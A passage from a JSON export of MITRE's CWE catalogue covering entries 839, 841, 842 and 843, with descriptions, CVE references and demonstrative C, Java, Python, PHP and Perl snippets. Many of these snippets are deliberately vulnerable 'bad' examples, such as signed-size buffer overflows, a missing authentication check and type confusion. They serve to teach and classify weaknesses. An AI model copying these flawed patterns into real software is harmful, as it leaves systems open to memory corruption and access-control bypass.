Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"839":{"attr":{"@_ID":"839","@_Name":"Numeric Range Comparison Without Minimum Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum.","Extended_Description":{"xhtml:p":["Some programs use signed integers or floats even when their values are only expected to be positive or 0. An input validation check might assume that the value is positive, and only check for the maximum value. If the value is negative, but the code assumes that the value is positive, this can produce an error. The error may have security consequences if the negative value is used for memory allocation, array access, buffer access, etc. Ultimately, the error could lead to a buffer overflow or other type of memory corruption.","The use of a negative number in a positive-only context could have security implications for other types of resources. For example, a shopping cart might check that the user is not requesting more than 10 items, but a request for -3 items could cause the application to calculate a negative price and credit the attacker\'s account."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"195","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"682","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"124","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Signed comparison","Description":"The \\"signed comparison\\" term is often used to describe when the program uses a signed variable and checks it to ensure that it is less than a maximum value (typically a maximum buffer size), but does not verify that it is greater than 0."}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"in some contexts, a negative value could lead to resource consumption."},{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory"],"Note":"If a negative value is used to access memory, buffers, or other indexable structures, it could access memory outside the bounds of the buffer."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Enforcement by Conversion","Description":"If the number to be used is always expected to be positive, change the variable type from signed to unsigned or size_t."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"If the number to be used could have a negative value based on the specification (thus requiring a signed value), but the number should only be positive to preserve code correctness, then include a check to ensure that the value is positive."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers;if (numHeaders > 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index < len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index >= 0 && index < len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"Intro_Text":"The following code shows a simple BankAccount class with deposit and withdraw methods.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final int MAXIMUM_WITHDRAWAL_LIMIT = 350;private double accountBalance;public BankAccount() {}public void deposit(double depositAmount) {...}public void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// variable for bank account balance","// constructor for BankAccount","// method to deposit amount into BankAccount","// method to withdraw amount from BankAccount","// other methods for accessing the BankAccount object"],"xhtml:div":[{"#text":"accountBalance = 0;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (withdrawAmount < MAXIMUM_WITHDRAWAL_LIMIT) {}else {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance;","xhtml:br":["",""]}},{"#text":"System.err.println(\\"Withdrawal amount exceeds the maximum limit allowed, please try again...\\");...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final int MINIMUM_WITHDRAWAL_LIMIT = 0;public final int MAXIMUM_WITHDRAWAL_LIMIT = 350;...public void withdraw(double withdrawAmount) {","xhtml:br":["","","","","","",""],"xhtml:i":"// method to withdraw amount from BankAccount","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (withdrawAmount < MAXIMUM_WITHDRAWAL_LIMIT &&withdrawAmount > MINIMUM_WITHDRAWAL_LIMIT) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":""}}}}}}}}],"Body_Text":["The withdraw method includes a check to ensure that the withdrawal amount does not exceed the maximum limit allowed, however the method does not check to ensure that the withdrawal amount is greater than a minimum value (CWE-129). Performing a range check on a value that does not include a minimum check can have significant security implications, in this case not including a minimum range check can allow a negative value to be used which would cause the financial application using this class to deposit money into the user account rather than withdrawing. In this example the if statement should the modified to include a minimum range check, as shown below.","Note that this example does not protect against concurrent access to the BankAccount balance variable, see CWE-413 and CWE-362.","While it is out of scope for this example, note that the use of doubles or floats in financial calculations may be subject to certain kinds of attacks where attackers use rounding errors to steal money."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-1866","Description":"Chain: integer overflow causes a negative signed value, which later bypasses a maximum-only check, leading to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1866"},{"Reference":"CVE-2009-1099","Description":"Chain: 16-bit counter can be interpreted as a negative value, compared to a 32-bit maximum value, leading to buffer under-write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099"},{"Reference":"CVE-2011-0521","Description":"Chain: kernel\'s lack of a check for a negative value leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0521"},{"Reference":"CVE-2010-3704","Description":"Chain: parser uses atoi() but does not check for a negative value, which can happen on some platforms, leading to buffer under-write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3704"},{"Reference":"CVE-2010-2530","Description":"Chain: Negative value stored in an int bypasses a size check and causes allocation of large amounts of memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2530"},{"Reference":"CVE-2009-3080","Description":"Chain: negative offset value to IOCTL bypasses check for maximum index, then used as an array index for buffer under-read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080"},{"Reference":"CVE-2008-6393","Description":"chain: file transfer client performs signed comparison, leading to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6393"},{"Reference":"CVE-2008-4558","Description":"chain: negative ID in media player bypasses check for maximum index, then used as an array index for buffer under-read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4558"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Type Conversion Vulnerabilities" Page 246"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Comparisons", Page 265"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"}]}},"841":{"attr":{"@_ID":"841","@_Name":"Improper Enforcement of Behavioral Workflow","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.","Extended_Description":{"xhtml:p":["By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the software or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses.","For example, a file-sharing protocol might require that an actor perform separate steps to provide a username, then a password, before being able to transfer files. If the file-sharing server accepts a password command followed by a transfer command, without any username being provided, the software might still perform the transfer.","Note that this is different than CWE-696, which focuses on when the software performs actions in the wrong sequence; this entry is closely related, but it is focused on ensuring that the actor performs actions in the correct sequence.","Workflow-related behaviors include:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Steps are performed in the expected order.","Required steps are not omitted.","Steps are not interrupted.","Steps are performed in a timely fashion."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"An attacker could cause the software to skip critical steps or perform them in the wrong order, bypassing its intended business logic. This can sometimes have security implications."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code is part of an FTP server and deals with various commands that could be sent by a user. It is intended that a user must successfully login before performing any other action such as retrieving or listing files.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def dispatchCommand(command, user, args):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if command == \'Login\':if command == \'Retrieve_file\':if command == \'List_files\':","xhtml:div":[{"#text":"loginUser(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"if authenticated(user) and ownsFile(user,args):sendFile(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"listFiles(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","","","","",""],"xhtml:i":["# user has requested a file","..."]}}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def dispatchCommand(command, user, args):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if command == \'List_files\':","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"if authenticated(user) and ownsDirectory(user,args):","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listFiles(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}}],"Body_Text":["The server correctly does not send files to a user that isn\'t logged in and doesnt own the file. However, the server will incorrectly list the files in any directory without confirming the command came from an authenticated user, and that the user is authorized to see the directory\'s contents.","Here is a fixed version of the above example:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-0348","Description":"Bypass of access/billing restrictions by sending traffic to an unrestricted destination before sending to a restricted destination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0348"},{"Reference":"CVE-2007-3012","Description":"Attacker can access portions of a restricted page by canceling out of a dialog.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3012"},{"Reference":"CVE-2009-5056","Description":"Ticket-tracking system does not enforce a permission setting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5056"},{"Reference":"CVE-2004-2164","Description":"Shopping cart does not close a database connection when user restores a previous order, leading to connection exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2164"},{"Reference":"CVE-2003-0777","Description":"Chain: product does not properly handle dropped connections, leading to missing NULL terminator (CWE-170) and segmentation fault.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777"},{"Reference":"CVE-2005-3327","Description":"Chain: Authentication bypass by skipping the first startup step as required by the protocol.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3327"},{"Reference":"CVE-2004-0829","Description":"Chain: File server crashes when sent a \\"find next\\" request without an initial \\"find first.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0829"},{"Reference":"CVE-2010-2620","Description":"FTP server allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2620"},{"Reference":"CVE-2005-3296","Description":"FTP server allows remote attackers to list arbitrary directories as root by running the LIST command before logging in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3296"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":40,"Entry_Name":"Insufficient Process Validation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-795"}},{"attr":{"@_External_Reference_ID":"REF-796"}},{"attr":{"@_External_Reference_ID":"REF-797"}},{"attr":{"@_External_Reference_ID":"REF-806"}},{"attr":{"@_External_Reference_ID":"REF-799"}},{"attr":{"@_External_Reference_ID":"REF-667"}},{"attr":{"@_External_Reference_ID":"REF-801"}},{"attr":{"@_External_Reference_ID":"REF-802","@_Section":"pages 29 - 41"}}]},"Notes":{"Note":{"attr":{"@_Type":"Research Gap"},"xhtml:p":["This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses.","The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles.","Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"842":{"attr":{"@_ID":"842","@_Name":"Placement of User into Incorrect Group","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software or the administrator places a user into an incorrect group.","Extended_Description":"If the incorrect group has more access or privileges than the intended group, the user might be able to bypass intended security policy to access unexpected resources or perform unexpected actions. The access-control system might not be able to detect malicious usage of this group membership.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"286","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1193","Description":"Operating system assigns user to privileged wheel group, allowing the user to gain root privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2010-3716","Description":"Chain: drafted web request allows the creation of users with arbitrary group membership.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3716"},{"Reference":"CVE-2008-5397","Description":"Chain: improper processing of configuration options causes users to contain unintended group memberships.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5397"},{"Reference":"CVE-2007-6644","Description":"CMS does not prevent remote administrators from promoting other users to the administrator group, in violation of the intended security model.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644"},{"Reference":"CVE-2007-3260","Description":"Product assigns members to the root group, allowing escalation of privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3260"},{"Reference":"CVE-2002-0080","Description":"Chain: daemon does not properly clear groups before dropping privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"843":{"attr":{"@_ID":"843","@_Name":"Access of Resource Using Incompatible Type (\'Type Confusion\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.","Extended_Description":{"xhtml:p":["When the program accesses the resource using an incompatible type, this could trigger logical errors because the resource does not have expected properties. In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access.","While this weakness is frequently associated with unions when parsing data with many different embedded object types in C, it can be present in any application that can interpret the same variable or memory location in multiple ways.","This weakness is not unique to C and C++. For example, errors in PHP applications can be triggered by providing array parameters when scalars are expected, or vice versa. Languages such as Perl, which perform automatic conversion of a variable of one type when it is accessed as if it were another type, can also contain these issues."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Object Type Confusion"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses a union to support the representation of different types of messages. It formats messages differently, depending on their type.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define NAME_TYPE 1#define ID_TYPE 2struct MessageBuffer{};int main (int argc, char **argv) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"int msgType;union {};","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"char *name;int nameID;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct MessageBuffer buf;char *defaultMessage = \\"Hello World\\";buf.msgType = NAME_TYPE;buf.name = defaultMessage;printf(\\"Pointer of buf.name is %p\\\\n\\", buf.name);buf.nameID = (int)(defaultMessage + 1);printf(\\"Pointer of buf.name is now %p\\\\n\\", buf.name);if (buf.msgType == NAME_TYPE) {}else {}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":"/* This particular value for nameID is used to make the code architecture-independent. If coming from untrusted input, it could be any value. */","xhtml:div":[{"#text":"printf(\\"Message: %s\\\\n\\", buf.name);","attr":{"@_style":"margin-left:10px;"}},{"#text":"printf(\\"Message: Use ID %d\\\\n\\", buf.nameID);","attr":{"@_style":"margin-left:10px;"}}]}}]}},"Body_Text":["The code intends to process the message as a NAME_TYPE, and sets the default message to \\"Hello World.\\" However, since both buf.name and buf.nameID are part of the same union, they can act as aliases for the same memory location, depending on memory layout after compilation.","As a result, modification of buf.nameID - an int - can effectively modify the pointer that is stored in buf.name - a string.","Execution of the program might generate output such as:",{"xhtml:div":{"xhtml:div":["Pointer of name is 10830","Pointer of name is now 10831","Message: ello World"]}},"Notice how the pointer for buf.name was changed, even though buf.name was not explicitly modified.","In this case, the first \\"H\\" character of the message is omitted. However, if an attacker is able to fully control the value of buf.nameID, then buf.name could contain an arbitrary pointer, leading to out-of-bounds reads or writes."]},{"Intro_Text":"The following PHP code accepts a value, adds 5, and prints the sum.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$value = $_GET[\'value\'];$sum = $value + 5;echo \\"value parameter is \'$value\'<p>\\";echo \\"SUM is $sum\\";","xhtml:br":["","",""]}},"Body_Text":["When called with the following query string:",{"xhtml:div":{"xhtml:div":"value=123"}},"the program calculates the sum and prints out:",{"xhtml:div":{"xhtml:div":"SUM is 128"}},"However, the attacker could supply a query string such as:",{"xhtml:div":{"xhtml:div":"value[]=123"}},"The \\"[]\\" array syntax causes $value to be treated as an array type, which then generates a fatal error when calculating $sum:",{"xhtml:div":{"xhtml:div":"Fatal error: Unsupported operand types in program.php on line 2"}}]},{"Intro_Text":"The following Perl code is intended to look up the privileges for user ID\'s between 0 and 3, by performing an access of the $UserPrivilegeArray reference. It is expected that only userID 3 is an admin (since this is listed in the third element of the array).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $UserPrivilegeArray = [\\"user\\", \\"user\\", \\"admin\\", \\"user\\"];my $userID = get_current_user_ID();if ($UserPrivilegeArray eq \\"user\\") {}else {}print \\"\\\\$UserPrivilegeArray = $UserPrivilegeArray\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"print \\"Regular user!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Admin!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":["In this case, the programmer intended to use \\"$UserPrivilegeArray->{$userID}\\" to access the proper position in the array. But because the subscript was omitted, the \\"user\\" string was compared to the scalar representation of the $UserPrivilegeArray reference, which might be of the form \\"ARRAY(0x229e8)\\" or similar.","Since the logic also \\"fails open\\" (CWE-636), the result of this bug is that all users are assigned administrator privileges.","While this is a forced example, it demonstrates how type confusion can have security consequences, even in memory-safe languages."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4577","Description":"Type confusion in CSS sequence leads to out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4577"},{"Reference":"CVE-2011-0611","Description":"Size inconsistency allows code execution, first discovered when it was actively exploited in-the-wild.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611"},{"Reference":"CVE-2010-0258","Description":"Improperly-parsed file containing records of different types leads to code execution when a memory location is interpreted as a different object than intended.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0258"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Exact"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-811","@_Section":""Type Confusion Vulnerabilities," page 59"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Type Confusion", Page 319"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any type-unsafe programming language."},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Type confusion weaknesses have received some attention by applied researchers and major software vendors for C and C++ code. Some publicly-reported vulnerabilities probably have type confusion as a root-cause weakness, but these may be described as \\"memory corruption\\" instead. This weakness seems likely to gain prominence in upcoming years.","For other languages, there are very few public reports of type confusion weaknesses. These are probably under-studied. Since many programs rely directly or indirectly on loose typing, a potential \\"type confusion\\" behavior might be intentional, possibly requiring more manual analysis."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-15"},"Modification":[{"Modification_Name":"CWE Content 